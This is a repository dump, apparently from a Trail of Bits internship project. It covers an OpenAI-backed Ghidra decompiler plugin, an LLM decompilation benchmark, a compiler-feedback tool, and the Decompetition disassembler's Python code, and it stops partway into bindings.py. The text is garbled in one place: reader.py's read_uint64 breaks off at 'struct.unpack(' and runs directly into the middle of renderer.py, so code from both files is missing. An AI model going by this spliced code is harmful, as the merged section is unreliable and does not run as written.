├── LICENSE ├── README.md ├── benchmark ├── README.md ├── benchmark.py └── unixcoder.py ├── compiler ├── README.md ├── binexport.py ├── compiler-star.py ├── decompetition_disassembler │ ├── README.md │ ├── binary │ │ ├── __init__.py │ │ ├── mapper.py │ │ ├── reader.py │ │ ├── renderer.py │ │ └── scanner.py │ ├── bindings.py │ ├── differ.py │ ├── disassembler.py │ └── requirements.txt ├── pseudoexport.py └── unixcoder.py ├── docs ├── GhidraGUI.md └── OpenAI_Queries.md ├── eval ├── README.md ├── c_corpus │ ├── disasm │ │ ├── baby_c_main_2021.txt │ │ ├── demesne_main_2021.txt │ │ ├── dublin_main_2021.txt │ │ ├── leipzig_main_2021.txt │ │ ├── malware_payload_2021.txt │ │ ├── rotterdam_reed_2021.txt │ │ └── winkey_check_2021.txt │ ├── prompts │ │ ├── baby_c_main_2021.txt │ │ ├── demesne_main_2021.txt │ │ ├── dublin_main_2021.txt │ │ ├── leipzig_main_2021.txt │ │ ├── malware_payload_2021.txt │ │ ├── rotterdam_reed_2021.txt │ │ └── winkey_check_2021.txt │ └── source │ │ ├── baby_c_main_2021.c │ │ ├── demesne_main_2021.c │ │ ├── dublin_main_2021.c │ │ ├── leipzig_main_2021.c │ │ ├── malware_payload_2021.c │ │ ├── rotterdam_reed_2021.c │ │ └── winkey_check_2021.c ├── cpp_corpus │ ├── disasm │ │ ├── baby_cpp_main_2021.txt │ │ ├── blaise_main_2021.txt │ │ ├── rumrum_main_2021.txt │ │ ├── rumrum_produce_2021.txt │ │ └── yurlungur_mutate_2021.txt │ ├── prompts │ │ ├── baby_cpp_main_2021.txt │ │ ├── blaise_main_2021.txt │ │ ├── rumrum_main_2021.txt │ │ ├── rumrum_produce_2021.txt │ │ └── yurlungur_mutate_2021.txt │ └── source │ │ ├── baby_cpp_main_2021.cpp │ │ ├── blaise_main_2021.cpp │ │ ├── rumrum_main_2021.cpp │ │ ├── rumrum_produce_2021.cpp │ │ └── yurlungur_mutate_2021.cpp ├── eval.py ├── extract_type.py ├── go_corpus │ ├── disasm │ │ ├── baby_go_main_2021.txt │ │ ├── cartree_main_2021.txt │ │ ├── goalie_main_2021.txt │ │ ├── oracle_predict_2021.txt │ │ └── scaffold_main_2021.txt │ ├── prompts │ │ ├── baby_go_main_2021.txt │ │ ├── cartree_main_2021.txt │ │ ├── goalie_main_2021.txt │ │ ├── oracle_predict_2021.txt │ │ └── scaffold_main_2021.txt │ └── source │ │ ├── baby_go_main_2021.go │ │ ├── cartree_main_2021.go │ │ ├── goalie_main_2021.go │ │ ├── oracle_predict_2021.go │ │ └── scaffold_main_2021.go └── rust_corpus │ ├── disasm │ ├── baby_rust_step_2021.txt │ ├── braintrust_new_2021.txt │ ├── endeavour_enco_2021.txt │ └── parasite_deco_2021.txt │ ├── prompts │ ├── baby_rust_step_2021.txt │ ├── braintrust_new_2021.txt │ ├── endeavour_enco_2021.txt │ └── parasite_deco_2021.txt │ └── source │ ├── baby_rust_step_2021.rs │ ├── braintrust_new_2021.rs │ ├── endeavour_enco_2021.rs │ └── parasite_deco_2021.rs ├── finetune ├── README.md ├── data │ ├── README.md │ ├── c_corpus │ │ └── README.md │ ├── cpp_corpus │ │ └── README.md │ ├── go_corpus │ │ └── README.md │ └── rust_corpus │ │ └── README.md ├── deepseek.yml ├── extract_c.py ├── extract_cpp.py ├── extract_go.py ├── extract_rust.py └── merge.py ├── ghidraRevAI.py ├── split ├── README.md ├── function_split.py └── unixcoder.py └── tests ├── README.md ├── graph ├── graph.cpp ├── http ├── http.go ├── lambda ├── lambda.cpp ├── linked ├── linked.cpp ├── map ├── map.rs ├── multi └── multi.rs /README.md: -------------------------------------------------------------------------------- 1 | This project was built by Akshat Parikh during the Trail of Bits 2022 Winter Internship. The project is provided as is. Contact opensource@trailofbits.com if you'd like to use this project. 2 | 3 | # Codex Decompiler 4 | Codex Decompiler is a Ghidra plugin that utilizes OpenAI's models to improve the decompilation and reverse engineering experience. It currently has the ability to take the disassembly from Ghidra and then feed it to OpenAI's models to decompile the code. The plugin also offers several other features to perform on the decompiled code such as finding vulnerabilities using OpenAI, generating a description using OpenAI, or decompiling the Ghidra pseudocode. Down below, you can see an example of the plugin being run in Ghidra and the available features. 5 | 6 | ![pluginDisplay](https://user-images.githubusercontent.com/68412398/212231570-7047ab53-92d1-49d0-a773-720e94d0fb48.png) 7 | 8 | The plugin supports both regular OpenAI API and Azure OpenAI API. It can be configured to use different models. 9 | 10 | Tested on Ghidra 10.3.1 with Java versions 11.0, 17.0, and 20.0. 11 | 12 | ## Setup 13 | 1. Download the repository and move the `ghidraRevAI.py` file in the `ghidra_scripts` directory, which by default is at `$USER_HOME/ghidra_scripts`. 14 | 2. Set the environment variable `OPENAI_API_KEY` with the Api Key of OpenAI/Azure OpenAI (or just set it in the popup in the next steps). 15 | 3. Open Ghidra and import the binary to analyze. 16 | 4. Open the "Script Manager" window in the "Window" menu. 17 | 5. Select the script named `ghidraRevAI.py`, check the checkbox, and click the Play/Run Script button to run the script. 18 | 6. A series of popups will appear to help configure the plugin. 19 | 7. Each time you open Ghidra run the `ghidraRevAI.py` script again. The plugin options will be shown in the "Edit > Tool Options" window, under the "Codex-Decompiler" section. 20 | 21 | ## Usage 22 | 1. To use the plugin, go to any function inside of the Listing window and press Ctrl+J (Cmd+J on MacOS). 23 | 2. A new window should pop up where you can see different operations that can be performed on the pseudocode in the taskbar. 24 | Here is an example of the taskbar. 25 | 26 | ![taskbar](https://user-images.githubusercontent.com/68412398/212239760-677c0483-386a-4de6-9ab2-ea7747a34a6a.png) 27 | 28 | Note: all of the output from OpenAI (pseudocode) is cached into the `ghidra_scripts` directory under the subfolder `output`. This is done to avoid unnecessary calls to the API which can be costly. 29 | ### List of Operations: 30 | - ![context](https://user-images.githubusercontent.com/68412398/212240054-dcad8e91-48bc-4555-9602-01c4708ed69e.png) Generate a description for the pseudocode displayed 31 | - ![edit](https://user-images.githubusercontent.com/68412398/212240118-23597a8e-1d83-445b-a948-f38cd802476b.png) View, edit, and resubmit the last prompt sent to OpenAI 32 | - ![save](https://user-images.githubusercontent.com/68412398/212240172-fb3261ef-4745-4945-9d6f-e214f5fd04bb.png) Save the changes in the pseudocode editor to the file output 33 | - ![refresh](https://user-images.githubusercontent.com/68412398/212240232-2d527eb3-0ab8-4601-8ac4-82c3eb5a22a6.png) Decompile the disassembly again 34 | - ![find](https://user-images.githubusercontent.com/68412398/212240274-cf901029-3fe3-4d0d-9fd0-888e67b7eb5f.png) Find vulnerabilities in the pseudocode 35 | - ![gear](https://user-images.githubusercontent.com/68412398/212240354-078b2676-e701-47c8-afb2-f5a6ecda6140.png) Decompile the pseudocode that Ghidra generated 36 | 37 | ## Limitations 38 | For any of the aforementioned features, the output from OpenAI can be faulty and inconsistent. Thus, before doing anything with the generated pseudocode or other data, make sure that it is correct. 39 | ## References 40 | 1. https://ghidra.re/ghidra_docs/api/ 41 | 2. https://www.javaprogrammingforums.com/java-swing-tutorials/915-how-add-line-numbers-your-jtextarea.html 42 | ## Acknowledgments/Contributions 43 | I would like to acknowledge everyone at Trail of Bits for helping me through this project and providing feedback. I thoroughly enjoyed my experience with the company and creating this tool. 44 | -------------------------------------------------------------------------------- /benchmark/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Benchmarking Tool 2 | This folder contains all the code for the decompilation benchmarking tool which can test the accuracy of a given LLM in decompilation tasks. 3 | This tool can be used with the dataset provided in the eval folder. 4 | For measuring the accuracy of the measurement, there are two modes where one mode scores the output by parsing the AST of the decompilation and the other mode determines the cosine similarity of the output. 5 | ## Usage 6 | The tool can be used as follows: 7 | ```bash 8 | python3 benchmark.py -p PATH_TO_PROMPTS -s PATH_TO_SOURCE_FILES -l LANGUAGE -m MODE 9 | ``` 10 | For the mode command line argument there are two values: (0: AST parsing) and (1: Code Similarity). In the benchmark.py file, there is a function named generate_llm_response which can be modified to work with any LLM. 11 | -------------------------------------------------------------------------------- /compiler/README.md: -------------------------------------------------------------------------------- 1 | # Compiler Augmented Generation Tool 2 | This folder contains all the code for the Compiler Augmented Generation tool which leverages different feedback mechanisms to guide an LLM in decompilation tasks. 3 | The tool supports five different modes to for feedback: bindiff (Bindiff output), disdiff (Disassembly Diff from Decompetition), objdump (Disassembly Diff from Objdump), ghidra (Ghidra Pseudocode Diff), ghidra_eval (Ghidra Pseuodocode Scoring) 4 | ## compiler-star.py 5 | This file contains the main tool. An example command for this tool is as follows: 6 | ```bash 7 | python3 compiler-star.py -p ./baby_cpp_main_2021.txt -b ../cpp.out -c clang++ -m ghidra -k ./ghidra_10.4_PUBLIC/support/analyzeHeadless -s ./ghidra_proj/ -o ./trailofbits/output -f '-g -O0' -u main -l cpp 8 | ``` 9 | This example command is running the tool on the baby_cpp_main_2021 prompt and binary from the eval folder. It is also using the ghidra feedback mode. 10 | The full list and description of all the command line arguments of this tool is given below: 11 | ```bash 12 | usage: Compiler Augmented LLM Decompilation [-h] -p PROMPT -b BINARY -o OUTPUT -c COMPILER [-f FLAGS] -m MODE [-i ITERATIONS] [-k HEADLESS] 13 | [-s PROJ] [-q STUB] -u FUNC -l LANGUAGE [-z ACCURACY_MODE] [-a SOURCE_FILE] 14 | 15 | This program uses chain of thought reasoning with LLMs and feedback from the compiler to improve decompilation results. 16 | 17 | options: 18 | -h, --help show this help message and exit 19 | -p PROMPT, --prompt PROMPT 20 | Path to initial disassembly prompt. 21 | -b BINARY, --binary BINARY 22 | Path to initial binary file. 23 | -o OUTPUT, --output OUTPUT 24 | Path to output directory. 25 | -c COMPILER, --compiler COMPILER 26 | Compiler binary to compile the files. 27 | -f FLAGS, --flags FLAGS 28 | Compiler flags. 29 | -m MODE, --mode MODE Feedback mode: (bindiff/disdiff/objdump/ghidra/ghidra-eval) 30 | -i ITERATIONS, --iterations ITERATIONS 31 | Number of iterations in chain of thought. 32 | -k HEADLESS, --headless HEADLESS 33 | Path to Ghidra headless binary (analyzeHeadless). 34 | -s PROJ, --proj PROJ Path to Ghidra project directory. 35 | -q STUB, --stub STUB Path to stub source file used in compiling. 36 | -u FUNC, --func FUNC Name of the function to be decompiled. 37 | -l LANGUAGE, --language LANGUAGE 38 | Language of initial binary file (C, CPP, Go, Rust). 39 | -z ACCURACY_MODE, --accuracy_mode ACCURACY_MODE 40 | Mode of Accuracy Measurement (0: AST parsing) (1: Code Similarity) 41 | -a SOURCE_FILE, --source_file SOURCE_FILE 42 | Path to source file used for accuracy measurements. 43 | ``` 44 | This file also has a function named generate_llm_response which can be easily modified to work with any LLM. Currently, it uses GPT-4. 45 | ## binexport.py 46 | This file is a ghidra headless script that allows you to export the BinExport file for any given binary. It is used in bindiff mode in the main tool. 47 | ## pseudoexport.py 48 | This file is a ghidra headless script that allows you to export the Ghidra pseudocode of a function from a binary. It is used in ghidra and ghidra_eval modes in the main tool. 49 | ## decompetition_disassembler 50 | This folder is a clone of the [Disassembler Differ](https://github.com/decompetition/disassembler/tree/master) from the Decompetition team. It is used in the disdiff mode in the main tool. 51 | 52 | ## Demos 53 | Here are the links to couple demos showing the tool in action. 54 | [Demo Showing LLM Fixing Compiler Errors](https://drive.google.com/file/d/1nqabvyky-_deZMT28ArDqjxYYw1U2d4Q/view?usp=sharing) 55 | [Demo Showing LLM Improving Decompilation](https://drive.google.com/file/d/1OhZh4RzZXkRNrxouDxtXqqe_EIHjfwYz/view?usp=sharing) 56 | -------------------------------------------------------------------------------- /compiler/binexport.py: -------------------------------------------------------------------------------- 1 | # This ghidra headless script allows you to get the binexport of the current program 2 | from com.google.security.binexport import BinExportExporter 3 | from java.io import File 4 | import os 5 | 6 | addr_set = currentProgram.getMemory() 7 | program_name = currentProgram.getName() 8 | output_path = os.environ['BINEXPORT_OUTPUT_PATH'] 9 | full_path = os.path.join(output_path, program_name + ".BinExport") 10 | name = File(full_path) 11 | exporter = BinExportExporter() 12 | exporter.export(name, currentProgram, addr_set, monitor) 13 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/README.md: -------------------------------------------------------------------------------- 1 | # Disassembler & Differ 2 | 3 | This is a refactor of the disassembler and differ used in Decompetition 2020. 4 | 5 | 6 | ## The Disassembler 7 | 8 | You can use the disassembler via the command line: 9 | 10 | ```sh 11 | python3 disassembler.py -l language path/to/binary.out funcname ... 12 | ``` 13 | 14 | This will produce plain text output. Add the `-y` option to get the YAML output 15 | used by the differ. This has the following format: 16 | 17 | ```yaml 18 | functions: 19 | (funcname): 20 | asm: | # disassembly text for this function 21 | nop 22 | nop 23 | nop 24 | map: # source code line number for each instruction, if available 25 | - 42 26 | - null 27 | - 108 28 | ``` 29 | 30 | The source map will only be present in YAML mode, and even then only when passed 31 | the `-s` option to enable the it. 32 | 33 | 34 | ## The Differ 35 | 36 | You can also use the differ via the command line: 37 | 38 | ```sh 39 | python3 differ.py path/to/candidate.yml path/to/target.yml 40 | ``` 41 | 42 | This will produce YAML output with the following format: 43 | 44 | ```yaml 45 | functions: 46 | (funcname): 47 | delta: 48 | - 1 # number of lines appearing only in the candidate 49 | - 2 # number of lines appearing in both disassemblies 50 | - 3 # number of lines appearing only in the target 51 | - 6 # total number of lines in this function 52 | hunks: 53 | - - 1 # hunk type (-1 = candidate only; 0 = shared; 1 = target only) 54 | - | # disassembly text for this hunk 55 | nop 56 | nop 57 | - 2 # total number of lines in this hunk 58 | - ... 59 | srcmap: # source code line numbers from the candidate 60 | - null 61 | - 69 62 | - ... 63 | ``` 64 | 65 | ## The Binary Class 66 | 67 | Most of the work happens in the disassembler, which has been spread over several 68 | files for readability. If you're interested in specific functionality, here's 69 | where to look: 70 | 71 | - `binary/__init__.py` contains the `Binary` class, but not much happens here. 72 | - `binary/mapper.py` has functions for mapping assembly instructions to source code lines. 73 | - `binary/reader.py` has functions for reading string constants out of the binary. 74 | - `binary/renderer.py` takes care of generating the disassembly text. 75 | - `binary/scanner.py` finds symbols and names in the binary. 76 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/__init__.py: -------------------------------------------------------------------------------- 1 | import capstone 2 | import fnmatch 3 | import re 4 | 5 | from elftools.elf.elffile import ELFFile 6 | 7 | from .mapper import Mapper 8 | from .reader import Reader 9 | from .renderer import Renderer 10 | from .scanner import Scanner 11 | 12 | # Regex for removing annoying Rust hashes: 13 | DERUST = re.compile(r'17h[0-9a-f]{16}E\b') 14 | 15 | 16 | class Binary: 17 | def __init__(self, path, language, arch=capstone.CS_ARCH_X86, mode=capstone.CS_MODE_64): 18 | self.file = open(path, 'rb') 19 | self.elf = ELFFile(self.file) 20 | self.cap = capstone.Cs(arch, mode) 21 | self.cap.detail = True 22 | 23 | self.language = language 24 | self.scanner = Scanner(self) 25 | self.mapper = Mapper(self) 26 | self.reader = Reader(self) 27 | self.renderer = Renderer(self) 28 | 29 | def disassemble(self, patterns, srcmap=True): 30 | result = {} 31 | 32 | for function in self.functions: 33 | fname = function.name 34 | for pattern in patterns: 35 | if fnmatch.fnmatchcase(fname, pattern): 36 | d, a = self.renderer.render_function(fname) 37 | if self.language == 'rust': 38 | d = [re.sub(DERUST, 'E', i) for i in d] 39 | fname = re.sub(DERUST, 'E', fname) 40 | if d and d[-1] != '': 41 | d.append('') 42 | 43 | output = {'asm': '\n'.join(d)} 44 | if srcmap: 45 | output['map'] = self.get_source_lines(a) 46 | result[fname] = output 47 | 48 | return result 49 | 50 | @property 51 | def functions(self): 52 | return self.scanner.functions 53 | 54 | def get_source_lines(self, addrs): 55 | return self.mapper.get_source_lines(addrs) 56 | 57 | @property 58 | def plt(self): 59 | return self.scanner.plt 60 | 61 | def read_string(self, addr): 62 | return self.reader.read_string(addr) 63 | 64 | @property 65 | def sections(self): 66 | return self.scanner.sections 67 | 68 | @property 69 | def symbols(self): 70 | return self.scanner.symbols 71 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/mapper.py: -------------------------------------------------------------------------------- 1 | import functools 2 | import intervaltree 3 | 4 | # The Mapper class handles mapping instruction 5 | # addresses to source code lines. It reads this 6 | # information out of the debug info as needed. 7 | 8 | class Mapper: 9 | def __init__(self, binary): 10 | self.binary = binary 11 | self.elf = binary.elf 12 | 13 | def get_source_line(self, address): 14 | """Map a single instruction address to a line number""" 15 | if address is None: 16 | return None 17 | matches = self.source_map[address] 18 | if len(matches) == 1: 19 | return next(iter(matches)).data 20 | # sys.stderr.write('Multiple source map lines!?\n') 21 | 22 | def get_source_lines(self, addresses): 23 | """Map a list of instruction addresses to a list of line numbers""" 24 | return list(map(self.get_source_line, addresses)) 25 | 26 | @functools.cached_property 27 | def source_map(self): 28 | index = intervaltree.IntervalTree() 29 | dinfo = self.elf.get_dwarf_info() 30 | 31 | def get_cu_die(cu): 32 | for die in cu.iter_DIEs(): 33 | if die.tag == 'DW_TAG_compile_unit': 34 | return die 35 | 36 | for cu in dinfo.iter_CUs(): 37 | # Go includes a huge amount of extra debug info. It's slow. Skip it. 38 | if self.binary.language == 'go': 39 | die = get_cu_die(cu) 40 | if die.attributes['DW_AT_name'].value != b'main': 41 | continue 42 | 43 | lineprog = dinfo.line_program_for_CU(cu) 44 | prevstate = None 45 | if lineprog is None: 46 | continue 47 | for entry in lineprog.get_entries(): 48 | if entry.state is None: 49 | continue 50 | if entry.state.end_sequence: 51 | prevstate = None 52 | continue 53 | if prevstate: 54 | a = prevstate.address 55 | z = entry.state.address 56 | if a == z: 57 | z += 1 58 | index[a:z] = prevstate.line 59 | prevstate = entry.state 60 | return index 61 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/reader.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | # The Reader class handles reading constants 4 | # (typically strings) out of the binary. 5 | 6 | class Reader: 7 | def __init__(self, binary): 8 | self.binary = binary 9 | self.elf = binary.elf 10 | 11 | def read_bytes(self, addr, size): 12 | """Read raw data from the binary""" 13 | stream = self.elf.stream 14 | offsets = list(self.elf.address_offsets(addr)) 15 | if len(offsets) != 1: 16 | return None 17 | stream.seek(offsets[0]) 18 | return stream.read(size) 19 | 20 | def read_string(self, addr, size=32): 21 | """Try to intelligently load a string constant""" 22 | if self.binary.language == 'c': 23 | return self.read_string_data(addr, size) 24 | 25 | elif self.binary.language == 'cpp': 26 | return self.read_string_data(addr, size) 27 | 28 | elif self.binary.language == 'go': 29 | _, _, string = self.read_string_struct(addr) 30 | if string and len(string) > 1: 31 | return string 32 | string = self.read_string_data(addr, size) 33 | if string and len(string) > 1: 34 | return string 35 | 36 | elif self.binary.language == 'rust': 37 | ptr, size, string = self.read_string_struct(addr) 38 | # The format {} is replaced by a space and the string after the format 39 | # is stored as a separate "struct str" at addr + 16. 40 | if self.read_bytes(ptr + size, 1) == b' ': 41 | _, _, suffix = self.read_string_struct(addr + 16) 42 | if string and suffix: 43 | return string + '{}' + suffix 44 | return string or self.read_string_data(addr, size) 45 | 46 | elif self.binary.language == 'swift': 47 | string = self.read_string_data(addr, size) 48 | if string and len(string) > 1: 49 | return string 50 | 51 | def read_string_data(self, addr, size, cstring=True): 52 | """Read UTF-8 character data from the binary""" 53 | if not addr or not size: 54 | return None 55 | 56 | mem = self.read_bytes(addr, min(32, size)) 57 | if not mem: 58 | return None 59 | if cstring: 60 | mem = mem.split(b'\x00')[0] 61 | 62 | try: 63 | mem = mem.decode('utf-8') 64 | except UnicodeDecodeError: 65 | return None 66 | 67 | if len(mem) > 29: 68 | mem = mem[:29] + '...' 69 | return mem 70 | 71 | def read_string_struct(self, addr): 72 | """Read a typical string struct (including data) from the binary""" 73 | ptr = self.read_uint64(addr) 74 | size = self.read_uint64(addr + 8) 75 | string = self.read_string_data(ptr, size) 76 | return ptr, size, string 77 | 78 | def read_uint64(self, addr): 79 | """Read a little-endian UInt64 from the binary""" 80 | mem = self.read_bytes(addr, 8) 81 | if not mem: 82 | return None 83 | return struct.unpack('= 0 else neg 10 | if -10 < num < 10: 11 | result += str(abs(num)) 12 | else: 13 | result += '0x%x' % abs(num) 14 | return result 15 | 16 | def is_terminal(instruction): 17 | """Returns whether or not an instruction redirects execution""" 18 | if instruction.mnemonic == 'jmp': 19 | return True 20 | if instruction.mnemonic == 'ud2': 21 | return True 22 | if capstone.x86.X86_GRP_RET in instruction.groups: 23 | return True 24 | if capstone.x86.X86_GRP_INT in instruction.groups: 25 | return True 26 | return False 27 | 28 | 29 | class Renderer: 30 | def __init__(self, binary): 31 | self.binary = binary 32 | self.elf = binary.elf 33 | self.cap = binary.cap 34 | self.plt = binary.plt 35 | self.functions = binary.functions 36 | self.sections = binary.sections 37 | self.symbols = binary.symbols 38 | 39 | self.memory = {} 40 | 41 | def render(self, name): 42 | """Disassemble a function or section""" 43 | if name in self.functions: 44 | return self.render_function(name) 45 | elif name in self.sections: 46 | return self.render_section(name) 47 | else: 48 | raise Exception('Could not find target: %s' % name) 49 | 50 | def render_address(self, addr, names={}): 51 | """Get the human-friendly name for an address if there is one""" 52 | if addr in self.symbols: 53 | return self.symbols[addr].name 54 | if self.plt[addr]: 55 | return next(iter(self.plt[addr])).data 56 | if addr in self.sections: 57 | return self.sections[addr].name 58 | if addr in self.memory: 59 | return self.memory[addr] 60 | if addr in names: 61 | return names[addr] 62 | # return '0x%x' % addr 63 | return None 64 | 65 | def render_disassembly(self, data, addr): 66 | """Disassemble a block of machine instructions""" 67 | disasm = list(self.cap.disasm(data, addr)) 68 | leaders = set([addr]) 69 | blocks = {} 70 | 71 | # Hack to force local scoping of global names: 72 | self.memory = {} 73 | 74 | for i in disasm: 75 | if capstone.x86.X86_GRP_JUMP in i.groups: 76 | leaders.add(i.operands[0].value.imm) 77 | leaders.add(i.address + i.size) 78 | 79 | leaders = sorted(leaders) 80 | for baddr in leaders: 81 | if baddr in self.sections or baddr in self.symbols: 82 | continue 83 | blocks[baddr] = 'block' + str(len(blocks) + 1) 84 | 85 | d = [] # Textual Disassembly 86 | a = [] # Instruction Addresses 87 | 88 | for i in disasm: 89 | if i.address in self.symbols: 90 | d.append(self.symbols[i.address].name + ':') 91 | a.append(i.address) 92 | elif i.address in self.sections: 93 | d.append(self.sections[i.address].name + ':') 94 | a.append(i.address) 95 | elif i.address in blocks: 96 | d.append(blocks[i.address] + ':') 97 | a.append(i.address) 98 | 99 | if i.mnemonic == 'nop': 100 | continue 101 | 102 | ops = ', '.join([self.render_operand(i, o, blocks) for o in i.operands]) 103 | d.append((' %-7s %s' % (i.mnemonic, ops)).rstrip()) 104 | a.append(i.address) 105 | 106 | if i.address >= leaders[-1] and is_terminal(i): 107 | break 108 | return d, a 109 | 110 | def render_function(self, name): 111 | """Disassemble a function by name or address""" 112 | func = self.functions[name] 113 | text = self.sections['.text'] 114 | a = func.range.start - text.addr 115 | z = func.range.stop - text.addr 116 | data = text.data()[a:z] 117 | return self.render_disassembly(data, func.addr) 118 | 119 | def render_operand(self, instruction, operand, names={}): 120 | """Generate a human-friendly representation for an assembly operand""" 121 | # Heavily based on the Capstone unit tests (in lieu of decent documentation): 122 | # https://github.com/aquynh/capstone/blob/next/bindings/python/test_x86.py#L206 123 | if operand.type == capstone.x86.X86_OP_REG: 124 | return instruction.reg_name(operand.reg) 125 | if operand.type == capstone.x86.X86_OP_IMM: 126 | if capstone.x86.X86_GRP_JUMP in instruction.groups or capstone.x86.X86_GRP_CALL in instruction.groups: 127 | name = self.render_address(operand.imm, names) 128 | if not name: 129 | name = 'mem' + str(len(self.memory) + 1) 130 | self.memory[operand.imm] = name 131 | return name 132 | return hext(operand.imm) 133 | if operand.type == capstone.x86.X86_OP_MEM: 134 | if operand.mem.segment == 0 and operand.mem.base == capstone.x86.X86_REG_RIP and operand.mem.index == 0: 135 | addr = instruction.address + instruction.size + operand.mem.disp 136 | name = self.render_address(addr, names) 137 | if not name: 138 | name = 'mem' + str(len(self.memory) + 1) 139 | self.memory[addr] = name 140 | string = self.binary.read_string(addr) 141 | if string: 142 | return '[' + name + ']; ' + json.dumps(string) 143 | else: 144 | return '[' + name + ']' 145 | result = '[' 146 | if operand.mem.segment != 0: 147 | result = instruction.reg_name(operand.mem.segment) + ':[' 148 | if operand.mem.base != 0: 149 | result += instruction.reg_name(operand.mem.base) 150 | if operand.mem.index != 0: 151 | if not result.endswith('['): 152 | result += '+' 153 | result += instruction.reg_name(operand.mem.index) 154 | if operand.mem.scale != 1: 155 | result += ' * %d' % operand.mem.scale 156 | if operand.mem.disp != 0: 157 | if result.endswith('['): 158 | result += hext(operand.mem.disp) 159 | else: 160 | result += hext(operand.mem.disp, pos='+') 161 | return result + ']' 162 | 163 | def render_section(self, name): 164 | """Disassemble a section by name or address""" 165 | s = self.sections[name] 166 | return self.render_disassembly(s.data(), s.addr) 167 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/binary/scanner.py: -------------------------------------------------------------------------------- 1 | import capstone 2 | 3 | from intervaltree import IntervalTree 4 | from elftools.elf.relocation import RelocationSection 5 | 6 | # The Scanner class handles finding named entries in an ELF binary, 7 | # specifically: sections, symbols, and functions. 8 | 9 | def address(instruction, operand): 10 | """Calculate the absolute address referred to by an instruction""" 11 | # Heavily based on the Capstone unit tests (in lieu of decent documentation): 12 | # https://github.com/aquynh/capstone/blob/next/bindings/python/test_x86.py#L206 13 | if operand.type == capstone.x86.X86_OP_REG and operand.reg == capstone.x86.X86_REG_RIP: 14 | return instruction.address + instruction.size 15 | if operand.type == capstone.x86.X86_OP_IMM: 16 | if capstone.x86.X86_GRP_JUMP in instruction.groups or capstone.x86.X86_GRP_CALL in instruction.groups: 17 | return operand.imm 18 | if operand.type == capstone.x86.X86_OP_MEM: 19 | if operand.mem.segment == 0 and operand.mem.base == capstone.x86.X86_REG_RIP and operand.mem.index == 0: 20 | return instruction.address + instruction.size + operand.mem.disp 21 | return None 22 | 23 | 24 | class Function: 25 | """Internal representation of a function""" 26 | def __init__(self, symbol): 27 | self.name = symbol.name 28 | self.addr = symbol.addr 29 | self.range = None 30 | 31 | 32 | class MiniMap: 33 | """A helper class to serve as a multi-key map""" 34 | def __init__(self): 35 | self.data = [] 36 | self.map = {} 37 | 38 | def __contains__(self, item): 39 | return item in self.map 40 | 41 | def __iter__(self): 42 | return iter(self.data) 43 | 44 | def __getitem__(self, key): 45 | return self.map[key] 46 | 47 | def add(self, value, *keys): 48 | for key in keys: 49 | self.map[key] = value 50 | self.data.append(value) 51 | 52 | def get(self, key, default=None): 53 | return self.map.get(key, default) 54 | 55 | 56 | class Scanner: 57 | def __init__(self, binary): 58 | self.elf = binary.elf 59 | self.cap = binary.cap 60 | 61 | self.sections = MiniMap() 62 | self.scan_sections() 63 | 64 | self.symbols = MiniMap() 65 | self.plt = IntervalTree() 66 | self.scan_symbols() 67 | 68 | self.functions = MiniMap() 69 | self.scan_functions() 70 | 71 | def scan_functions(self): 72 | """Collect all local function symbols""" 73 | functions = [] 74 | text = self.sections['.text'] 75 | 76 | for symbol in self.symbols: 77 | if symbol['st_info']['type'] == 'STT_FUNC': 78 | if symbol.addr in text.range: 79 | f = Function(symbol) 80 | self.functions.add(f, f.name, f.addr) 81 | functions.append(f) 82 | 83 | functions.sort(key=lambda f: f.addr) 84 | for i in range(1, len(functions)): 85 | # Assume that all functions are contiguous... 86 | functions[i-1].range = range(functions[i-1].addr, functions[i].addr) 87 | # And assume that the last function ends the .text section... 88 | functions[-1].range = range(functions[-1].addr, text.range.stop) 89 | 90 | def scan_plt(self): 91 | """Get symbols for any functions called through the .plt""" 92 | section = self.sections.get('.plt') 93 | if not section: return 94 | 95 | prev = section.addr 96 | for instruction in self.cap.disasm(section.data(), section.addr): 97 | if capstone.x86.X86_GRP_JUMP in instruction.groups: 98 | addr = address(instruction, instruction.operands[0]) 99 | if addr != section.addr: 100 | symbol = self.symbols.get(addr) 101 | if symbol and symbol.name: 102 | addr = instruction.address + instruction.size 103 | self.plt[prev:addr] = symbol.name + '@plt' 104 | prev = instruction.address + instruction.size 105 | 106 | def scan_plt_sec(self): 107 | """Get symbols for any functions called through the .plt.sec""" 108 | section = self.sections.get('.plt.sec') 109 | if not section: return 110 | 111 | prev = section.addr 112 | for instruction in self.cap.disasm(section.data(), section.addr): 113 | if capstone.x86.X86_GRP_JUMP in instruction.groups: 114 | addr = address(instruction, instruction.operands[0]) 115 | symbol = self.symbols.get(addr) 116 | if symbol and symbol.name: 117 | addr = instruction.address + instruction.size 118 | self.plt[prev:addr] = symbol.name + '@plt.sec' 119 | prev = instruction.address + instruction.size 120 | 121 | def scan_sections(self): 122 | """Index all available sections and their addresses""" 123 | for section in self.elf.iter_sections(): 124 | section.addr = section['sh_addr'] 125 | section.range = range(section.addr, section.addr + section.data_size) 126 | self.sections.add(section, section.name, section.addr) 127 | 128 | def scan_symbols(self): 129 | """Find and index all the symbols that we can""" 130 | self.scan_symtab() 131 | self.scan_relocations() 132 | 133 | self.scan_plt() 134 | self.scan_plt_sec() 135 | 136 | def scan_symtab(self): 137 | """Read symbols stored in the .symtab section""" 138 | for symbol in self.sections['.symtab'].iter_symbols(): 139 | if symbol.name: 140 | symbol.addr = symbol.__dict__['entry']['st_value'] 141 | self.symbols.add(symbol, symbol.name, symbol.addr) 142 | 143 | def scan_relocations(self): 144 | """Read symbols from any relocation sections""" 145 | for section in self.sections: 146 | if isinstance(section, RelocationSection): 147 | symtab = self.elf.get_section(section['sh_link']) 148 | for relocation in section.iter_relocations(): 149 | symbol = symtab.get_symbol(relocation['r_info_sym']) 150 | if symbol.name: 151 | symbol.addr = relocation['r_offset'] 152 | self.symbols.add(symbol, symbol.name, symbol.addr) 153 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/bindings.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import io 3 | import yaml 4 | from decompetition_disassembler.binary import Binary 5 | from diff_match_patch import diff_match_patch 6 | dmp = diff_match_patch() 7 | 